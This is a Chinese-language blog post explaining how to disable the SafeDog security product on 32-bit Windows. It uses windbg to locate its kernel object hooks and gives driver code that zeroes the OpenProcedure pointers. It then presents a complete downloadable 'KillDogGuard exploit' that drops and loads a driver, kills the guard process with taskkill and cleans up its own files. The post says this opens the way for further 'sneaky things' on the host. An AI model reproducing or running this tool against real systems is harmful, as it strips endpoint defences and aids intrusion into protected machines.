前言

本文探讨如何在 r0 层恢复某狗的驱动 hook，从而去掉其各种限制。当然 r3 层也有很多猥琐方法，本文暂先不表。
首先用 PCHunter 查看驱动SafeDogFileGuard.sys

[PC Hunter Standard][ObjectType Hook]: 15
函数名 当前函数地址 Hook 原地址 Object类型 地址 当前函数地址所在模块
.......
OpenProcedure 0xB145E79A object hook - PsThreadType 0x8055A35C C:\WINDOWS\system32\DRIVERS\SafeDogFileGuard.sys
OpenProcedure 0xB145E5CE object hook - PsProcessType 0x8055A358 C:\WINDOWS\system32\DRIVERS\SafeDogFileGuard.sys
......

两个 object hook

windbg 调试

某狗hook 了OpenProcedure
先来用windbg调试之

kd> dd PsProcessType     //获取 PsProcessType 地址  
8055a358 89e34e38 89e34c68 e10017e8 00000002
8055a368 00000003 00000000 00000000 00000000
8055a378 00000000 00000000 e18ee2ff e1754857
8055a388 e16bba07 00000000 00000000 00000000
8055a398 00000000 00000000 e19022c7 e209cc27
8055a3a8 00000000 00000000 00000000 00000000
8055a3b8 00000000 00000000 00000002 00000000
8055a3c8 00000000 00000000 00000000 00000000
kd> dt 89e34e38 _object_type //查看 _object_type 结构体 找到 _OBJECT_TYPE_INITIALIZER 结构偏移
ntdll!_OBJECT_TYPE
+0x000 Mutex : _ERESOURCE
+0x038 TypeList : _LIST_ENTRY [ 0x89e34e70 - 0x89e34e70 ]
+0x040 Name : _UNICODE_STRING "Process"
+0x048 DefaultObject : (null)
+0x04c Index : 5
+0x050 TotalNumberOfObjects : 0x1a
+0x054 TotalNumberOfHandles : 0x63
+0x058 HighWaterNumberOfObjects : 0x1c
+0x05c HighWaterNumberOfHandles : 0x71
+0x060 TypeInfo : _OBJECT_TYPE_INITIALIZER
+0x0ac Key : 0x636f7250
+0x0b0 ObjectLocks : [4] _ERESOURCE
kd> dt 89e34e38+0x060 _OBJECT_TYPE_INITIALIZER
ntdll!_OBJECT_TYPE_INITIALIZER
+0x000 Length : 0x4c
+0x002 UseDefaultObject : 0 ''
+0x003 CaseInsensitive : 0 ''
+0x004 InvalidAttributes : 0xb0
+0x008 GenericMapping : _GENERIC_MAPPING
+0x018 ValidAccessMask : 0x1f0fff
+0x01c SecurityRequired : 0x1 ''
+0x01d MaintainHandleCount : 0 ''
+0x01e MaintainTypeList : 0 ''
+0x020 PoolType : 0 ( NonPagedPool )
+0x024 DefaultPagedPoolCharge : 0x1000
+0x028 DefaultNonPagedPoolCharge : 0x290
+0x02c DumpProcedure : (null)
+0x030 OpenProcedure : 0xb137a5ce long +0
+0x034 CloseProcedure : (null)
+0x038 DeleteProcedure : 0x805c77e2 void nt!PspProcessDelete+0
+0x03c ParseProcedure : (null)
+0x040 SecurityProcedure : 0x805edcf6 long nt!SeDefaultObjectMethod+0
+0x044 QueryNameProcedure : (null)
+0x048 OkayToCloseProcedure : (null)
kd> u 0xb137a5ce //汇编0xb137a5ce
SafeDogFileGuard+0x85ce:
b137a5ce 8bff mov edi,edi
b137a5d0 55 push ebp
b137a5d1 8bec mov ebp,esp
b137a5d3 8b450c mov eax,dword ptr [ebp+0Ch]
b137a5d6 83ec0c sub esp,0Ch
b137a5d9 56 push esi
b137a5da 33f6 xor esi,esi
b137a5dc 57 push edi
kd> dt _OBJECT_TYPE_INITIALIZER poi(PsThreadType)+0x60 //根据上面结果一步到位
ntdll!_OBJECT_TYPE_INITIALIZER
+0x000 Length : 0x4c
+0x002 UseDefaultObject : 0 ''
+0x003 CaseInsensitive : 0 ''
+0x004 InvalidAttributes : 0xb0
+0x008 GenericMapping : _GENERIC_MAPPING
+0x018 ValidAccessMask : 0x1f03ff
+0x01c SecurityRequired : 0x1 ''
+0x01d MaintainHandleCount : 0 ''
+0x01e MaintainTypeList : 0 ''
+0x020 PoolType : 0 ( NonPagedPool )
+0x024 DefaultPagedPoolCharge : 0
+0x028 DefaultNonPagedPoolCharge : 0x288
+0x02c DumpProcedure : (null)
+0x030 OpenProcedure : 0xb137a79a long +0
+0x034 CloseProcedure : (null)
+0x038 DeleteProcedure : 0x805c796a void nt!PspThreadDelete+0
+0x03c ParseProcedure : (null)
+0x040 SecurityProcedure : 0x805edcf6 long nt!SeDefaultObjectMethod+0
+0x044 QueryNameProcedure : (null)
+0x048 OkayToCloseProcedure : (null)
kd> u 0xb137a79a
SafeDogFileGuard+0x879a:
b137a79a 8bff mov edi,edi
b137a79c 55 push ebp
b137a79d 8bec mov ebp,esp
b137a79f 83ec30 sub esp,30h
b137a7a2 53 push ebx
b137a7a3 56 push esi
b137a7a4 57 push edi
b137a7a5 ff7510 push dword ptr [ebp+10h]

代码恢复 object hook

根据第 2 节的调试结果
驱动入口中写入

// Address of the OpenProcedure callback for the Process object type:
// *PsProcessType is an _OBJECT_TYPE, +0x60 is its TypeInfo (_OBJECT_TYPE_INITIALIZER)
// and +0x30 inside that is OpenProcedure.  Both offsets are taken from the windbg
// dump above; they are hard-coded for that 32-bit build and are not validated here.
// NOTE(review): the (ULONG) cast assumes 32-bit pointers.
ULONG uProcssAddr=(ULONG)(*PsProcessType)+0x60+0x30; // OpenProcedure pointer in [PsProcessType]
KdPrint(("[+] OpenProcdure [PsProcessType] 0x%08x\n",uProcssAddr));
// NOTE(review): the callback is zeroed rather than restored; whatever value the
// field held before it was hooked is not shown on this page, so it cannot be
// put back from here, and the write is neither synchronized nor range-checked.
*(PULONG)uProcssAddr = 0x00000000; // clear the OpenProcedure pointer for [PsProcessType]
ULONG uThreadAddr=(ULONG)(*PsThreadType)+0x60+0x30; // same computation for the Thread object type
KdPrint(("[+] OpenProcdure [PsThreadType] 0x%08x\n",uThreadAddr));
*(PULONG)uThreadAddr = 0x00000000; // clear the OpenProcedure pointer for [PsThreadType]

windbg 调试日志

[+] -------------------- DriverEntry  -----------------
Break instruction exception - code 80000003 (first chance)
HelloDrive!DriverEntry+0xaf:
bac7922f cc int 3
kd> p
HelloDrive!DriverEntry+0xb0:
bac79230 8b0d18a0c7ba mov ecx,dword ptr [HelloDrive!PsProcessType (bac7a018)]
kd> p
HelloDrive!DriverEntry+0xc1:
bac79241 8b45fc mov eax,dword ptr [ebp-4]
kd> p
[+] OpenProcdure [PsProcessType] 0x89e34ec8
HelloDrive!DriverEntry+0xd2:
bac79252 8b4dfc mov ecx,dword ptr [ebp-4]
kd> p
HelloDrive!DriverEntry+0xdb:
bac7925b 8b1514a0c7ba mov edx,dword ptr [HelloDrive!PsThreadType (bac7a014)]
kd> p
HelloDrive!DriverEntry+0xeb:
bac7926b 8b4df8 mov ecx,dword ptr [ebp-8]
kd> p
[+] OpenProcdure [PsThreadType] 0x89e34cf8
HelloDrive!DriverEntry+0xfc:
bac7927c 8b55f8 mov edx,dword ptr [ebp-8]
kd> p
HelloDrive!DriverEntry+0x105:
bac79285 33c0 xor eax,eax
kd> dd poi(PsProcessType)+0x60+0x30 l1
89e34ec8 00000000
kd> dd poi(PsThreadType)+0x60+0x30 l1
89e34cf8 00000000
kd> g
[+] -------------------- Driver Unload -----------------

指针的值已经为 00000000，说明 hook 已经废了
现在就可以干一系列的猥琐事了
比如

C:\Documents and Settings\Administrator>taskkill /im SafeDogGuardCenter.exe /f
成功: 已终止进程 "SafeDogGuardCenter.exe",其 PID 为 1156。

C:\Documents and Settings\Administrator>net user

\\FUCKAV-A5A6BAA4 的用户帐
-------------------------------------------------------------------------------
Administrator Guest HelpAssistant
SUPPORT_388945a0 test
命令成功完成。

KillDogGuard 编写

为了方便，写成单个文件，其执行过程为

运行 KillDogGuard.exe -> 释放 KillDogGuard.sys -> 加载驱动 启动 -> unhook OpenProcedure -> 结束守护进程 -> 卸载驱动 删除文件

vc 6.0 代码

#include "stdafx.h"
#include "resource.h"
#include <STDIO.H>
#include <WINDOWS.H>
#define DRIVE "KillDogGuard.sys"

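/*
 * Print one status line prefixed with a severity tag.
 *
 * type == 0 -> "[*]" (info), type == 1 -> "[+]" (success),
 * any other value -> "[-]" (failure; callers pass -1).
 * Parameters are const so string literals bind without a deprecated
 * conversion; a NULL strMsg prints as an empty message instead of
 * being dereferenced.
 */
void msg(const char* strMsg, int type = 0)
{
    const char* tag = "[*]";
    switch (type) {
    case 0:
        break;
    case 1:
        tag = "[+]";
        break;
    default:
        tag = "[-]";
        break;
    }
    printf("%s%s\r\n", tag, strMsg ? strMsg : "");
}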

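/*
 * Register lpszDriverImagePath as a kernel-driver service called
 * lpszDriverName and start it.
 *
 * Returns TRUE when the service is running afterwards (freshly started or
 * already running), FALSE on any SCM failure.  A pre-existing service with
 * the same name is reused rather than treated as an error.  Both SCM
 * handles are closed on every path.
 *
 * Fixes relative to the previous version: the HTML-escaped `&amp;&amp;`
 * is restored to `&&`, the inner `dwRtn` no longer shadows the outer one,
 * the empty else branches are gone, and the parameters are const so the
 * string-literal callers compile cleanly.
 */
BOOL LoadDriver(const char* lpszDriverName, const char* lpszDriverImagePath)
{
    BOOL bRet = FALSE;
    SC_HANDLE hScm = NULL;
    SC_HANDLE hService = NULL;
    DWORD dwErr = 0;

    // Open the service control manager.  SERVICE_ALL_ACCESS is kept from
    // the original; creating and starting a service needs far less.
    hScm = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (hScm == NULL) {
        goto BeforeLeave;
    }

    // Create the registry entry for the driver: kernel-driver type,
    // demand start, errors ignored, image path = the dropped .sys file.
    hService = CreateService(hScm,
                             lpszDriverName,        // service (registry) name
                             lpszDriverName,        // display name
                             SERVICE_ALL_ACCESS,
                             SERVICE_KERNEL_DRIVER,
                             SERVICE_DEMAND_START,
                             SERVICE_ERROR_IGNORE,
                             lpszDriverImagePath,
                             NULL, NULL, NULL, NULL, NULL);
    if (hService == NULL) {
        dwErr = GetLastError();
        if (dwErr != ERROR_IO_PENDING && dwErr != ERROR_SERVICE_EXISTS) {
            goto BeforeLeave;
        }
        // The service already exists: open the existing entry instead.
        hService = OpenService(hScm, lpszDriverName, SERVICE_ALL_ACCESS);
        if (hService == NULL) {
            goto BeforeLeave;
        }
    }

    // Start the driver.  "Already running" counts as success; a pending
    // start is reported as failure, as before.
    if (StartService(hService, 0, NULL)) {
        bRet = TRUE;
    } else {
        dwErr = GetLastError();
        bRet = (dwErr == ERROR_SERVICE_ALREADY_RUNNING) ? TRUE : FALSE;
    }

BeforeLeave:
    if (hService) {
        CloseServiceHandle(hService);
    }
    if (hScm) {
        CloseServiceHandle(hScm);
    }
    return bRet;
}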

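/*
 * Stop and delete the kernel-driver service named lpszSerName.
 *
 * Returns FALSE when the SCM or the service cannot be opened, or when
 * DeleteService fails (previously that failure was swallowed and TRUE
 * returned, leaving a stale service entry behind unnoticed).  A failed
 * SERVICE_CONTROL_STOP is tolerated: the driver then stays resident until
 * reboot, but the service entry is still deleted.  Both handles are closed
 * on every path.
 */
BOOL UnLoadNTDriver(const char* lpszSerName)
{
    BOOL bRet = FALSE;
    SC_HANDLE hScm = NULL;
    SC_HANDLE hService = NULL;
    SERVICE_STATUS status = {0};   // zeroed so ControlService never sees garbage

    // Open the service control manager.
    hScm = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (hScm == NULL) {
        goto BeforeLeave;
    }

    // Open the service that owns the driver.
    hService = OpenService(hScm, lpszSerName, SERVICE_ALL_ACCESS);
    if (hService == NULL) {
        goto BeforeLeave;
    }

    // Ask the driver to stop; a refusal is not fatal for deletion.
    ControlService(hService, SERVICE_CONTROL_STOP, &status);

    // Remove the service entry and report the real outcome.
    bRet = DeleteService(hService);

BeforeLeave:
    if (hService) {
        CloseServiceHandle(hService);
    }
    if (hScm) {
        CloseServiceHandle(hScm);
    }
    return bRet;
}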

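/*
 * Program entry: write the embedded driver resource to the current
 * directory, load it as a service, run the post-load step, then unload
 * the service and delete the dropped file.
 *
 * Returns 0 on success and 1 on any failure.  The previous version
 * returned `false` (exit code 0) on its failure paths, so a caller could
 * not distinguish failure from success; it also compared the unsigned
 * byte count with 0, never checked WriteFile's result, used the
 * LoadResource handle directly instead of LockResource, leaked the file
 * handle on the write-failure path, and strcat'ed into a MAX_PATH buffer
 * without a length check.
 */
int main(int argc, char* argv[])
{
    msg("KillDogGuard exploit By Yaseng");

    HRSRC hResInfo = FindResource(NULL, MAKEINTRESOURCE(IDR_SYS1), "SYS");
    if (hResInfo == NULL) {
        msg("FindResource KillDogGuard.sys failed", -1);
        return 1;
    }

    HGLOBAL hRes = LoadResource(NULL, hResInfo);
    if (hRes == NULL) {
        msg("LoadResource KillDogGuard.sys failed", -1);
        return 1;
    }
    // LoadResource yields a handle; the resource bytes come from LockResource.
    const BYTE* lpDataBuffer = (const BYTE*)LockResource(hRes);
    DWORD dwFileSize = SizeofResource(NULL, hResInfo);
    if (lpDataBuffer == NULL || dwFileSize == 0) {
        msg("LockResource KillDogGuard.sys failed", -1);
        return 1;
    }

    // Build the absolute path once and use it for create, load and delete,
    // checking that "<cwd>\KillDogGuard.sys" fits in the buffer.
    char pBuf[MAX_PATH];
    DWORD dwLen = GetCurrentDirectory(MAX_PATH, pBuf);
    if (dwLen == 0 || dwLen >= MAX_PATH
        || dwLen + strlen("\\" DRIVE) >= MAX_PATH) {
        msg("GetCurrentDirectory failed or path too long", -1);
        return 1;
    }
    strcat(pBuf, "\\" DRIVE);

    HANDLE hFile = CreateFile(pBuf, GENERIC_WRITE, FILE_SHARE_WRITE, NULL,
                              CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        msg("CreateFile KillDogGuard.sys failed", -1);
        return 1;
    }
    DWORD dwWrite = 0;
    // dwWrite is unsigned, so `dwWrite < 0` could never fire; check the
    // call's result and that the whole image reached the file.
    BOOL bWritten = WriteFile(hFile, lpDataBuffer, dwFileSize, &dwWrite, NULL);
    CloseHandle(hFile);
    if (!bWritten || dwWrite != dwFileSize) {
        msg("WriteFile KillDogGuard.sys failed", -1);
        DeleteFile(pBuf);
        return 1;
    }
    msg("Release KillDogGuard.sys succeed ", 1);

    if (LoadDriver(DRIVE, pBuf)) {
        msg("InstallDrive KillDogGuard.sys succeed ", 1);
    } else {
        msg("InstallDrive KillDogGuard.sys failed ", -1);
        DeleteFile(pBuf);
        return 1;
    }
    //do something

    system("taskkill /im SafeDogGuardCenter.exe /f");

    UnLoadNTDriver(DRIVE);
    DeleteFile(pBuf);
    msg("KillDogGuard exploit succeed -_- good luck !!!", 1);
    return 0;
}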

高清无码图

代码下载

KillDogGuard

参考资料

object hook :http://bbs.pediy.com/showthread.php?t=128161